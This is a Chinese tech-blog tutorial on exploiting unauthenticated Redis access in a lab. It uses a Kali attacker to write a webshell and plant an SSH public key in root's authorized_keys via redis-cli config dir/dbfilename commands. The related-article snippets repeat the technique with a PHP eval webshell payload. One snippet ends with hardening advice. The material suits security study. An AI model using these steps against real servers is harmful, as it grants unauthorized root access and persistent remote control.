web中间件漏洞-Redis漏洞未授权访问漏洞-写webshell、写ssh公钥

于 2024-06-22 21:21:09 发布
阅读量304 收藏 5
点赞数 10
分类专栏: 0803实操-Web中间件漏洞 文章标签: 中间件 redis ssh
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
本文链接:https://blog.csdn.net/Alsn86/article/details/139887468
版权

web中间件漏洞-Redis漏洞未授权访问漏洞

利用redis未授权访问漏洞写webshell

利用redis未授权访问、攻击机向服务器写入webshell
在这里插入图片描述
从服务器查看写入的webshell
在这里插入图片描述
菜刀连接
在这里插入图片描述

利用redis未授权访问漏洞写ssh公钥

kali生成rsa公私钥对
ssh-keygen -t rsa
在这里插入图片描述
将公钥id_rsa.pub写入文件bar.txt中,将bar.txt上传到远程服务器,完整的命令如下:catbar.txt|redis-cli-h192.168.1.2-xsetkali;首先读取出了bar.txt中存放的公钥。-x的官方解释是从标准输入中得到值作为最后一个参数,-x即ReadlastargumentfromSTDIN。命令相当于远程连接到redis服务器之后,执行setkali【bat.txt的内容】,kali是key,公钥内容是value。保存认证密钥,通过Redis-CLI远程管理,设置Redis的默认路径以及数据库缓存文件名,默认情况下ssh服务读取用户家目录下的.ssh文件夹中的公钥对连接的用户进行验证。这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authorized_keys文件里。
保存认证密钥,通过Redis-CLI远程管理,设置Redis的默认路径以及数据库缓存文件名,默认情况下ssh服务读取用户家目录下的.ssh文件夹中的公钥对连接的用户进行验证。这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authorized_keys文件里。
在这里插入图片描述
使用本机私钥免密连接服务器,执行ssh-iid_rsaroot@192.168.1.2
在这里插入图片描述

Alsn86
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
Redis授权访问配合SSH key文件利用详解
09-09
3. 使用`redis-cli`连接到暴露的Redis实例,并将公钥内容设置为一个键的值。 4. 修改Redis的`dir`配置以指向`/root/.ssh/`目录,并设置`dbfilename`为`authorized_keys`。 5. 保存更改,这样公钥就会被写入`...
六、利用rediswebshell
dahege666的博客
03-02 890
一、测试环境 靶机 centos7 192.168.1.27 攻击机 kali 192.168.1.138 二、测试过程 服务器配置phpstudy ,截图略过 1. 下载Phpstudy for Linux的bin文件 操作命令: wget -c http://lamp.phpstudy.net/phpstudy.bin 2. 配置phpstudy.bin文件的可执...
Redis webshell详解
m0_54313550的博客
04-19 464
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
redis授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 687
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
Redis授权访问漏洞的利用
L18296069161的博客
12-16 193
渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流!  利用rediswebshell  在redis-cli中写入以下命令: config set dir /var/www/html/ config set dbfilename redis.php set webshell “<?php phpinfo(); ?>” save  然后看一下...
redis攻防-ssh登录、主从复制、授权访问、计划任务、webshell
weixin_46626737的博客
06-30 648
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
resty-redis-cluster:Redis集群的Openresty lua客户端
02-03
《深入理解resty-redis-cluster:Openresty Lua中的Redis集群客户端》 在现代Web服务开发中,数据存储和缓存扮演着至关重要的角色。Redis作为一款高性能的键值存储系统,广泛应用于缓存、消息队列等领域。而...
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
Another-Redis-Desktop-Manager.1.5.6
07-22
标题中的“Another-Redis-Desktop-Manager.1.5.6”指的是Another Redis Desktop Manager的1.5.6版本。这是一款专为Redis数据库设计的桌面管理工具,它提供了直观的图形用户界面(GUI),方便用户进行数据的查看、...
常见运维漏洞-Redis.pptx
08-03
常见运维漏洞-Redis.pptx
tomcat-redis-session-manager
06-06
`tomcat-redis-session-manager`就是这样一款解决方案,它将Tomcat的session管理与Redis相结合,实现了跨服务器的session共享。 首先,让我们理解`tomcat-redis-session-manager`的核心概念。这是一个开源项目,它...
scrapy-redis-master_scrapy-redis_juzi1122_scrapy_
10-01
综上所述,Scrapy-Redis是一个强大的工具,为大规模的Web抓取任务提供了有效的解决方案。通过结合Scrapy的灵活性和Redis的高并发能力,它能够处理复杂的网络爬虫需求,实现高效的分布式爬取。在实际应用中,理解并...
Another-Redis-Desktop-Manager.1.6.1
09-23
Redis桌面管理器Another-Redis-Desktop-Manager详解》 Redis,全称为Remote Dictionary Server,是一种高性能的键值存储系统,常被用作数据库、缓存和消息中间件。其简洁的数据结构和丰富的数据类型使其在分布式...
rediswebshell
干铮的博客
01-31 765
利用rediswebshell kali@ToolsScannerKali20201:~$ redis-cli -h 192.168.3.28 192.168.3.28:6379> config set dir /usr/local/nginx/html OK 192.168.3.28:6379> config set dbfilename shell.php OK 192.168.3.28:6379> set x "<?php @eval($_REQUEST[123])?&g
利用rediswebshell
八月的专栏
03-13 1349
redis和mongodb我之所见 最近自己在做一些个人的小创作、小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识。 都是所谓的“非关系型数据库”,有什么区别么? 实际上,在我看来,redis的角色更接近于memcache,而mongodb是一个真正的数据库。 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,比memca
Redis 授权访问 写入webshell记录
qq_38053759的博客
04-08 860
Redis 授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值